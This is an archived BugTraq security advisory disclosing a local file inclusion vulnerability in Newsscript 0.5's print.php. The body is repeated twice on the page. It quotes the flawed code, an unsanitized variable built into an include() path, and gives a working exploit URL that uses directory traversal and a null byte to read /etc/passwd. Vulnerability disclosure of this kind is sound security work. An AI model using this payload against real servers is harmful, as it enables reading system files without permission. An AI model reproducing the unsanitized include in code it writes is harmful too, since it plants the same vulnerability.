BugTraq
Back to list
|
Post reply
Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability
Sep 12 2006 03:06AM
daftrix gmail com
# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Emaill - mail (at) webmaster-journal (dot) com [email concealed]
--- Website - http://webmaster-journal.com
# Available in:
---http://www.comscripts.com/scripts/php.wm-news.203.html
# Vulnerability:
--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---
---
--- 27 include($file_name);
# Exploit:
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
# Discovered By:
--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Emaill - mail (at) webmaster-journal (dot) com [email concealed]
--- Website - http://webmaster-journal.com
# Available in:
---http://www.comscripts.com/scripts/php.wm-news.203.html
# Vulnerability:
--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---
---
--- 27 include($file_name);
# Exploit:
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
# Discovered By:
--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com
[ reply ]